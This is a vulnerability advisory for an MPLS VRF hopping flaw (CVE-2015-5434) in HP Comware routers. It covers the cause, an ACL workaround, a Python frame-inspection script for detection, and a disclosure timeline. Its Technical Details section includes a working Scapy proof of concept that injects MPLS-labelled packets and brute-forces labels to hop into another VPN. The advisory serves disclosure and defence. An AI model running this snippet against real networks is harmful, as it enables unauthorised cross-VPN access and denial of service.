HPE VRF Hopping Vulnerability

Product: HP Comware 5 and Comware 7
Severity: Medium
CVE Reference: CVE-2015-5434
Type: VRF Hopping Vulnerability

Description

Virtual Routing and Forwarding (VRF) allows multiple instances of a routing table to exist and operate simultaneously on the same physical device. This technology can be applied for Layer 3 network segmentation, analogous to Virtual LAN (VLAN) on Layer 2. VRF is commonly used as a building block for Layer 3 Virtual Private Network (VPN) services in Multiprotocol Label Switching (MPLS) networks.

A Virtual Routing and Forwarding (VRF) hopping vulnerability exists in a number of Hewlett Packard Enterprise (HPE) routers. The affected routers fail to discard maliciously crafted MPLS traffic, which an attacker can exploit remotely to forward traffic from one VPN into another VPN over MPLS links.

Impact

Successful VRF hopping attacks can result in traffic being forwarded into an arbitrary VRF, or potentially lead to a Denial of Service (DoS) condition.

Cause

Certain routers fail to discard customer-generated MPLS traffic received on a Provider Edge (PE) link to a Customer Edge (CE) device.

Interim Workaround

A possible workaround, as suggested by the vendor, is to apply a Layer 2 Access Control List (ACL) on a PE's customer-facing interface. This ACL must be configured to discard traffic pre-encapsulated in MPLS, which is achieved by filtering out Ethernet frames with EtherType of 0x8847.
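The following added Python script is not from the advisory or the vendor; it shows, in software, the check the workaround ACL performs in hardware: parse a raw Ethernet frame received on a CE-facing interface, look past an 802.1Q tag, flag EtherType 0x8847 (and its multicast counterpart 0x8848, which the advisory does not mention), and decode the MPLS label stack so a detection rule can log which label the customer attempted to inject. The sample frames and MAC addresses are constructed placeholders.

```python
import struct

# EtherTypes relevant to the workaround ACL (0x8847 is the one the advisory names).
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_VLAN = 0x8100
ETHERTYPE_MPLS_UNICAST = 0x8847
ETHERTYPE_MPLS_MULTICAST = 0x8848   # generalisation beyond the advisory text

def mpls_entry(label, tc=0, bos=1, ttl=64):
    """Pack one 32-bit MPLS label stack entry: label(20) | TC(3) | S(1) | TTL(8)."""
    return struct.pack("!I", (label << 12) | (tc << 9) | (bos << 8) | ttl)

def parse_mpls_stack(payload):
    """Decode label entries until the bottom-of-stack bit; returns [(label, tc, ttl), ...]."""
    labels, offset = [], 0
    while offset + 4 <= len(payload):
        (entry,) = struct.unpack("!I", payload[offset:offset + 4])
        labels.append((entry >> 12, (entry >> 9) & 0x7, entry & 0xFF))
        offset += 4
        if (entry >> 8) & 0x1:          # S bit set: this was the last entry
            return labels
    raise ValueError("MPLS label stack has no bottom-of-stack entry")

def inspect_frame(frame):
    """Describe a raw Ethernet frame; looks past one 802.1Q tag so a tagged MPLS frame is not missed."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    offset, vlan = 14, None
    if ethertype == ETHERTYPE_VLAN:
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        vlan, offset = tci & 0x0FFF, 18
    info = {"src": src.hex(":"), "dst": dst.hex(":"), "vlan": vlan,
            "ethertype": ethertype, "labels": []}
    if ethertype in (ETHERTYPE_MPLS_UNICAST, ETHERTYPE_MPLS_MULTICAST):
        info["labels"] = parse_mpls_stack(frame[offset:])
    return info

def should_drop(frame):
    """Workaround policy for a CE-facing PE interface: discard anything pre-encapsulated in MPLS."""
    return inspect_frame(frame)["ethertype"] in (ETHERTYPE_MPLS_UNICAST, ETHERTYPE_MPLS_MULTICAST)

# Constructed sample frames (placeholder MACs, a zeroed stand-in for the inner IPv4 header).
SRC_MAC = bytes.fromhex("080027122713")
DST_MAC = bytes.fromhex("020000000001")
DUMMY_IP = bytes(20)
MPLS_FRAME = DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_MPLS_UNICAST) + mpls_entry(1000) + DUMMY_IP
TAGGED_MPLS_FRAME = (DST_MAC + SRC_MAC + struct.pack("!HH", ETHERTYPE_VLAN, 10)
                     + struct.pack("!H", ETHERTYPE_MPLS_UNICAST) + mpls_entry(1000, ttl=63) + DUMMY_IP)
PLAIN_IP_FRAME = DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_IPV4) + DUMMY_IP
```

Feed inspect_frame() the frames captured on a customer-facing interface to log the injected label; should_drop() is the decision the workaround ACL makes for the same frame.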

Solution

Software updates have been released by the vendor to address the VRF hopping vulnerability. Please refer to HPE's security advisory for detailed information on affected versions and the available software fixes [1].

Technical Details

An adversary with access to a CE device can pre-encapsulate her traffic in MPLS in order to coerce a PE router into forwarding it into an arbitrary VRF. The attacker can either assign a fixed label value or, if the label is unknown, brute-force a valid label.

The following Scapy snippet can be used to reproduce the attack, where '' and '' are the attacker’s and victim’s IP addresses respectively.

>>> from scapy.all import *
>>> load_contrib('mpls')
>>> a = Ether(src = '08:00:27:12:27:13', dst = 'XX:XX:XX:a3:7b:01')
>>> b = MPLS(ttl = 64, label = range(1000, 1500))  # a range of labels makes Scapy emit one packet per candidate label
>>> c = IP(src = '', dst = '')
>>> d = ICMP()
>>> sendp(a/b/c/d)
Sent 500 packets.

For further details, possible attack scenarios and limitations, please refer to G. Geshev’s slide deck from B-Sides NYC [2].

Detailed Timeline

Initial contact with HPE
HPE requesting details from MWR
Technical details disclosed to HPE
HPE confirms reception
Further technical details requested by HPE
Further details provided by MWR
HPE acknowledges reception
HPE confirms a number of products are affected
Fix released by HPE

[2] G. Geshev, "Warranty Void If Label Removed", slide deck, B-Sides NYC.